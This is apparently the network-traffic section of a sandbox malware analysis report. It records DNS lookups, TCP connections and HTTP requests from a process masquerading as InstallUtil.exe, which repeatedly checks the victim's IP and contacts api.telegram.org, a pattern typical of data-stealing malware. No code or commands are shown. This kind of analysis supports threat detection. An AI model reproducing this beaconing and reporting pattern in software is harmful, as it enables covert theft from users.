                                                                    Oct 30, 2024 01:42:29.472733974 CET44349760188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:29.472815990 CET49760443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:29.473040104 CET49760443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:29.473051071 CET44349760188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:29.517997026 CET4975980192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:30.085700989 CET44349760188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:30.087141991 CET49760443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:30.087161064 CET44349760188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:30.240936995 CET44349760188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:30.240992069 CET44349760188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:30.241058111 CET49760443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:30.241377115 CET49760443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:30.244534016 CET4975980192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:30.245650053 CET4976180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:30.250781059 CET8049759193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:30.250863075 CET4975980192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:30.251086950 CET8049761193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:30.251226902 CET4976180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:30.251286030 CET4976180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:30.256584883 CET8049761193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:30.925256014 CET8049761193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:30.926625013 CET49762443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:30.926651955 CET44349762188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:30.926748991 CET49762443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:30.926959991 CET49762443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:30.926970005 CET44349762188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:30.971101046 CET4976180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:31.557262897 CET44349762188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:31.559259892 CET49762443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:31.559278011 CET44349762188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:31.725229025 CET44349762188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:31.725277901 CET44349762188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:31.725349903 CET49762443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:31.725681067 CET49762443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:31.728800058 CET4976180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:31.729999065 CET4976380192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:31.734519958 CET8049761193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:31.734600067 CET4976180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:31.735399008 CET8049763193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:31.735486031 CET4976380192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:31.735548973 CET4976380192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:31.740952969 CET8049763193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:32.388011932 CET8049763193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:32.389283895 CET49764443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:32.389370918 CET44349764188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:32.389583111 CET49764443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:32.389689922 CET49764443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:32.389715910 CET44349764188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:32.439860106 CET4976380192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:33.031025887 CET44349764188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:33.033220053 CET49764443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:33.033298016 CET44349764188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:33.187391996 CET44349764188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:33.187431097 CET44349764188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:33.187560081 CET49764443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:33.188055992 CET49764443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:33.192224979 CET4976380192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:33.193707943 CET4976580192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:33.197926044 CET8049763193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:33.198009968 CET4976380192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:33.199100971 CET8049765193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:33.199187994 CET4976580192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:33.199286938 CET4976580192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:33.204608917 CET8049765193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:33.852431059 CET8049765193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:33.854028940 CET49766443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:33.854083061 CET44349766188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:33.854257107 CET49766443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:33.854484081 CET49766443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:33.854501963 CET44349766188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:33.893107891 CET4976580192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:34.451523066 CET44349766188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:34.453562975 CET49766443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:34.453600883 CET44349766188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:34.599785089 CET44349766188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:34.599823952 CET44349766188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:34.599920988 CET49766443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:34.600478888 CET49766443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:34.604345083 CET4976580192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:34.605647087 CET4976780192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:34.610296965 CET8049765193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:34.610420942 CET4976580192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:34.611023903 CET8049767193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:34.611104965 CET4976780192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:34.611223936 CET4976780192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:34.616668940 CET8049767193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:35.283556938 CET8049767193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:35.285197973 CET49768443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:35.285290003 CET44349768188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:35.285485983 CET49768443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:35.285706043 CET49768443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:35.285744905 CET44349768188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:35.330636024 CET4976780192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:35.935338020 CET44349768188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:35.937117100 CET49768443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:35.937181950 CET44349768188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:36.097230911 CET44349768188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:36.097268105 CET44349768188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:36.097327948 CET49768443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:36.097783089 CET49768443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:41.298645020 CET4976780192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:41.299293995 CET49769443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:41.299325943 CET44349769149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:41.299384117 CET49769443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:41.299730062 CET49769443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:41.299741983 CET44349769149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:41.309437990 CET8049767193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:41.309499979 CET4976780192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:42.133332968 CET44349769149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:42.133554935 CET49769443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:42.137821913 CET49769443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:42.137831926 CET44349769149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:42.138029099 CET44349769149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:42.140228033 CET49769443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:42.187374115 CET44349769149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:42.187454939 CET49769443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:42.187463999 CET44349769149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:42.464493990 CET44349769149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:42.518018961 CET49769443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:42.518034935 CET44349769149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:42.529098988 CET49769443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:42.529133081 CET44349769149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:42.529191017 CET49769443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:43:14.930926085 CET8049734193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:43:14.930979967 CET4973480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:43:33.082436085 CET8049757193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:43:33.082535982 CET4975780192.168.2.4193.122.130.0

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 30, 2024 01:42:00.261220932 CET5290853192.168.2.41.1.1.1
                                                                    Oct 30, 2024 01:42:00.293009996 CET53529081.1.1.1192.168.2.4
                                                                    Oct 30, 2024 01:42:06.377686024 CET5911253192.168.2.41.1.1.1
                                                                    Oct 30, 2024 01:42:06.385016918 CET53591121.1.1.1192.168.2.4
                                                                    Oct 30, 2024 01:42:07.389158964 CET4996853192.168.2.41.1.1.1
                                                                    Oct 30, 2024 01:42:07.396660089 CET53499681.1.1.1192.168.2.4
                                                                    Oct 30, 2024 01:42:23.572830915 CET5140553192.168.2.41.1.1.1
                                                                    Oct 30, 2024 01:42:23.580025911 CET53514051.1.1.1192.168.2.4
                                                                    Oct 30, 2024 01:42:45.697705984 CET5355168162.159.36.2192.168.2.4
                                                                    Oct 30, 2024 01:42:46.530877113 CET53520021.1.1.1192.168.2.4

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Oct 30, 2024 01:42:00.261220932 CET192.168.2.41.1.1.10xa0efStandard query (0)nexoproducciones.clA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:06.377686024 CET192.168.2.41.1.1.10x39a2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:07.389158964 CET192.168.2.41.1.1.10xb2a9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:23.572830915 CET192.168.2.41.1.1.10xc6d4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Oct 30, 2024 01:42:00.293009996 CET1.1.1.1192.168.2.40xa0efNo error (0)nexoproducciones.cl190.107.177.80A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:06.385016918 CET1.1.1.1192.168.2.40x39a2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:06.385016918 CET1.1.1.1192.168.2.40x39a2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:06.385016918 CET1.1.1.1192.168.2.40x39a2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:06.385016918 CET1.1.1.1192.168.2.40x39a2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:06.385016918 CET1.1.1.1192.168.2.40x39a2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:06.385016918 CET1.1.1.1192.168.2.40x39a2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:07.396660089 CET1.1.1.1192.168.2.40xb2a9No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:07.396660089 CET1.1.1.1192.168.2.40xb2a9No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 01:42:23.580025911 CET1.1.1.1192.168.2.40xc6d4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • nexoproducciones.cl
                                                                    • reallyfreegeoip.org
                                                                    • api.telegram.org
                                                                    • checkip.dyndns.org

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449731193.122.130.0805544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:06.396419048 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:07.049274921 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:06 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 155959fe275b72aca7df13a1f0989eed
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
                                                                    Oct 30, 2024 01:42:07.053508997 CET127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Oct 30, 2024 01:42:07.209347010 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:07 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 025c508fffa4eff38e0edc3f9886515b
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
                                                                    Oct 30, 2024 01:42:08.293610096 CET127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Oct 30, 2024 01:42:08.454603910 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:08 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 7c7fc35afc0488e2b4642fab99e18c96
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449734193.122.130.0805544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:09.222760916 CET127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Oct 30, 2024 01:42:09.896565914 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:09 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 5d274b8a5374666cb196ae6bd87928b4
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.449736193.122.130.0805544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:10.670017958 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:11.326838017 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:11 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 945075b7e006ca13ae5930f19fdbc6af
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.449738193.122.130.0805544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:12.105473995 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:12.776197910 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:12 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 8e5d87c6d9648e60f86248a7a1bb99a7
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.449740193.122.130.0805544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:13.565906048 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:14.225440025 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:14 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 33232889e78bf36d353e45c97a6fc99d
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.449742193.122.130.0805544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:15.105926991 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:15.775194883 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:15 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 5886d425a66eb876aceebe49fcb7734a
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.449744193.122.130.0805544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:16.557185888 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:17.229612112 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:17 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: cd02f5cb0a0a2a1940585126eec484a6
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.449754193.122.130.080600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:24.635499954 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:25.319849968 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:25 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 928265bcbf42670884939dff65a9f539
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
                                                                    Oct 30, 2024 01:42:25.322902918 CET127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Oct 30, 2024 01:42:25.483360052 CET323INHTTP/1.1 200 OK
